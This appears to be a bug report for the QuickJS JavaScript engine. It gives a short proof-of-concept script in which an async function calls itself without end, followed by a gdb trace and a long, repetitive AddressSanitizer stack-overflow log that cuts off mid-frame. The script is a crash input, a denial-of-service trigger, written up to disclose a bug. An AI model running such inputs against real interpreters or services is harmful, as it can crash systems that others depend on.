# Enviroment ``` operating system: ubuntu18.04 compile command: make CONFIG_ASAN=y test command: ./qjs poc ``` # poc: ``` let x = 'foo'; const y = { z: 0 }; const a = './ode_FIXTURE.js'; const b = './moFIXTURE.js'; async function fn() { var eBZE = fn(); fn(); } var THdX = fn(); var DakD = unescape('f5~=1~nl'); ``` # crash location: ?ꐠ0x7ffff6e8c7e9 push r12 0x7ffff6e8c7eb mov r13, rdx 0x7ffff6e8c7ee push rbp 0x7ffff6e8c7ef push rbx 0x7ffff6e8c7f0 sub rsp, 0x78 0x7ffff6e8c7f4 mov rax, QWORD PTR fs:0x28 ?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€ threads ?€?€?€?€ [#0] Id 1, Name: "qjs", stopped 0x7ffff6e8c7e9 in ?? (), reason: SIGSEGV ?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€?€ trace ?€?€?€?€ [#0] 0x7ffff6e8c7e9 ?ꐠpush r12 [#1] 0x7ffff6f025d3 ?ꐠmalloc() [#2] 0x474db2 ?ꐠjs_def_malloc(s=0x61600000fca0, size=<optimized out>) [#3] 0x47fa17 ?ꐠjs_malloc_rt() [#4] 0x47fa17 ?ꐠjs_malloc(ctx=0x61500000fd00, size=<optimized out>) [#5] 0x73904c ?ꐠjs_new_shape2.constprop.82(ctx=0x61500000fd00, proto=0x60700000df40, prop_size=0x2, hash_size=0x4) [#6] 0x613df0 ?ꐠjs_new_shape() [#7] 0x613df0 ?ꐠJS_NewObjectProtoClass(ctx=0x61500000fd00, proto_val={ # vulnerability description: ASAN:SIGSEGV ================================================================= ==101779==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd517ebfb8 (pc 0x7fc841b28568 bp 0x7ffd517ec800 sp 0x7ffd517ebfa0 T0) #0 0x7fc841b28567 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98567) #1 0x43d87c in js_def_malloc /home/node/xQuickJS/quickjs.c:1567 #2 0x445b6c in js_malloc_rt /home/node/xQuickJS/quickjs.c:1220 #3 0x445b6c in js_mallocz_rt /home/node/xQuickJS/quickjs.c:1241 #4 0x445b6c in js_mallocz /home/node/xQuickJS/quickjs.c:1272 #5 0x5e2a79 in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18779 #6 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #7 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #8 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #9 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #10 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #11 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #12 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #13 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #14 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #15 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #16 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #17 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #18 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #19 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #20 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #21 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #22 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #23 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #24 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #25 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #26 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #27 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #28 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #29 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #30 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #31 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #32 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #33 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #34 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #35 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #36 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #37 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #38 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #39 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #40 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #41 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #42 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #43 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #44 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #45 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #46 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #47 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #48 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #49 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #50 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #51 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #52 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #53 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #54 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #55 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #56 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #57 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #58 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #59 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #60 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #61 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #62 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #63 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #64 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #65 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #66 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #67 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #68 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #69 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #70 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #71 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #72 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #73 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #74 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #75 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #76 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #77 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #78 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #79 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #80 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #81 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #82 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #83 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #84 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #85 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #86 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #87 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #88 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #89 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #90 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #91 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #92 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #93 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #94 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #95 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #96 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #97 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #98 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #99 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #100 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #101 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #102 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #103 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #104 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #105 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #106 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #107 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #108 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #109 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #110 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #111 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #112 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #113 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #114 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #115 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #116 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #117 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #118 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #119 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #120 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #121 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #122 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #123 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #124 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #125 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #126 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #127 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #128 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #129 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #130 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #131 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #132 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #133 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #134 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #135 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #136 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #137 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #138 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #139 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #140 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #141 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #142 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #143 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #144 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #145 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #146 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #147 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #148 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #149 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #150 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #151 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #152 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #153 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #154 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #155 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #156 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #157 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #158 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #159 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #160 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #161 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #162 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #163 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #164 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #165 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #166 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #167 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #168 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #169 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #170 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #171 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #172 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #173 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #174 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #175 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #176 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #177 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #178 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #179 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #180 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #181 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #182 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #183 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #184 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #185 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #186 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #187 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #188 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #189 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #190 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #191 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #192 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #193 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #194 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #195 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #196 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #197 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #198 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #199 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #200 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #201 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #202 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #203 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #204 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #205 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #206 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #207 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #208 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #209 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #210 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #211 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #212 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #213 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #214 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #215 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #216 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #217 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #218 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #219 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #220 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #221 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #222 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #223 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #224 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #225 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #226 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #227 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #228 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #229 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #230 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #231 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #232 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #233 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #234 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #235 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #236 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #237 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #238 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #239 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #240 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #241 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #242 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #243 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #244 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #245 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #246 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #247 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #248 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #249 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #250 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #251 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #252 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #253 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #254 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #255 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #256 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #257 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #258 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #259 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #260 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #261 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #262 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #263 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #264 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #265 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #266 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #267 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #268 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #269 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #270 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #271 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #272 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #273 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #274 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #275 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #276 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #277 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #278 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #279 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #280 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #281 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #282 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #283 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #284 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #285 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #286 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #287 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #288 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #289 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #290 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #291 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #292 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #293 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #294 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #295 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #296 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #297 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #298 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #299 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #300 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #301 